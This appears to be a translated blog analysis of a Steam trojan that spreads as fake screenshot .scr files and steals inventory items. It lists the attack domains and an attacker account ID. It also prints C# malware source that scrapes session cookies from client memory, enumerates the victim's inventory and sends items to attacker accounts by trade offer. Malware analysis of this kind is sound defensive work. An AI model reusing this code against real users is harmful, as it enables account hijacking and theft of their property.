Steam Trojan Stealing Trojan



Although it has been known about this trojan for a long time, it acquired real mass character at the end of November.
What is interesting in it is that instead of the usual theft of logins and passwords, from which you can quite easily protect yourself, it directly steals items from the Steam inventory.

Valve has been aware of the problem for a long time, but has not taken any special actions for several months, although the current wave can be stopped without problems with small changes in the Steam client.

Steam’s inventory contains items from several popular Valve games, some of which can cost a pretty impressive amount (by the standards of color pixels). It also stores items related to Steam itself (gift copies of games, profile backgrounds, emoticons, etc.).

Infection


Infection occurs as follows. An unsuspecting user receives a message that contains a link to an allegedly screenshot of the inventory, with a proposal to exchange items. After clicking on the link, the .scr file, which has an icon that looks like a thumbnail of the image, automatically starts to load. Considering that by default in Windows the extension is disabled, and even if it is enabled, .scr may well be taken as a “screenshot”, everything looks very believable.



After launching the file, the trojan unpacks the image from the resources and opens it (there really is a screenshot of the inventory or some object in the picture). Some of the modifications are written to autorun.



In parallel with this, the trojan extracts cookies from the Steam client’s memory, makes a request to steamcommunity.com to get the session identifier, searches for suitable items in the inventory and sends them through the “Trade Request” to the prepared accounts of the attackers.

By the way, while writing this article, I found another version of the trojan (obviously based on public sources), which was written a little differently and had additional functions, for example, sending messages via a friends list.

By the way, the original name of the collected file was “Maksim Steam Offer.exe”, which the reflector kindly told me, and the identifier of the profile to which the stolen items go is 76561198009197365. The domain from which the trojan spread (and is being distributed at the time of writing) is “puush -me.com ”(for those who decide to play the detective, log in from under the virtual machine). And yes, it’s unfocused there.

A few domains that I managed to collect:

take-screen.org
fastscreen.org
my-screenshot.net
puush-me.com
picturesfast.net
screen-url.com

What is remarkable, most of them are registered with Russian registrars.

We pick the source


The trojan itself is written in C #, which is very unusual for this kind of software. In the sources I downloaded from the Internet, there were several files: WinApis.cs, containing several methods for working with winapi.cs, Http.cs, containing methods for emulating requests from the steam client (up to the last header) and Program.cs, in which and all the action took place.

Interestingly, the total amount of code is only about 500 lines.

Cookies from the client’s memory receive both variations of the Trojan with the following regularity:

MatchCollection matchs = new Regex("7656119[0-9]{10}%7c%7c[A-F0-9]{40}", RegexOptions.IgnoreCase).Matches(preparedIDs);

Then, using the received cookies, a request is sent to steamcommunity.com to get the session identifier, for which there is a separate (and rather rather big) method in Http.cs.

Having received the identifier, the trojan, using the steamcommunity api, gets the contents of the inventory:

private static List GetItems(string steamID, string appID)
{
    List items = new List();
    while (true)
    {
        string link = "profiles/" + steamID + "/inventory/json/" + appID + "/2/";
        string json = Http.SteamWebRequest(cookiesContainer, link, null, "");
        try
        {
            JObject inventory = JObject.Parse(json);
            if (((inventory.SelectToken("success") != null) && ((bool)inventory.SelectToken("success"))) &&
               (inventory.SelectToken("rgDescriptions")).First != null)
            {
                IJEnumerable descriptionsBase = inventory.SelectToken("rgDescriptions").Values();
                foreach (JToken eachItem in inventory.SelectToken("rgInventory").Values())
                {
                    JToken infoAbout = descriptionsBase.Where(each => each["classid"].ToString() == eachItem["classid"].ToString()).First();
                    if (infoAbout["tradable"].ToString() == "1")
                    {
                        string[] item = new string[] { appID, eachItem["amount"].ToString(), eachItem["id"].ToString(), infoAbout["market_name"].ToString(), infoAbout["type"].ToString().ToLower() };
                        if (!items.Contains(item)) { items.Add(item); }
                    }
                }
            }
            break;
        }
        catch { return null; }
    }
    return items;
}

Sorts it according to the specified filters:

listed = FilterByRarity(listed, "common,");
private static List FilterByRarity(List input, string filter)
{
    string[] filters = filter.Split(',');
    List output = new List();
    for (int i = 0; i < input.Count; i++)
    {
        for (int x = 0; x < filters.Length; x++)
        {
            string[] types = input[i][4].Split(' ');
            for (int c = 0; c < types.Length; c++)
            {
                if (types[c] == filters[x] && !output.Contains(input[i]))
                {
                    output.Add(input[i]);
                    break;
                }
            }
        }
    }
    return output;
}

And suitable items (often quite expensive) are sent to pre-prepared accounts:

private static string sentItems(string sessionID, string items, string[] Offer)
{
    return Http.SteamWebRequest(cookiesContainer,
         "tradeoffer/new/send",
         "sessionid=" + sessionID + 
         "&partner=" + Offer[0] +
         "&tradeoffermessage=&json_tradeoffer=%7B%22newversion%22%3Atrue%2C%22version%22%3A2%2C%22me%22%3A%7B%22assets%22%3A%5B" + items +
         "%5D%2C%22currency%22%3A%5B%5D%2C%22ready%22%3Afalse%7D%2C%22them%22%3A%7B%22assets%22%3A%5B%5D%2C%22currency%22%3A%5B%5D%2C%22ready%22%3Afalse%7D%7D&trade_offer_create_params=%7B%22trade_offer_access_token%22%3A%22" + Offer[2] + "%22%7D",
         "tradeoffer/new/?partner=" + Offer[1] + "&token=" + Offer[2]);
}

One precaution - use linux do not open links sent by strangers and use antiviruses (they perfectly detect it).

Also popular now: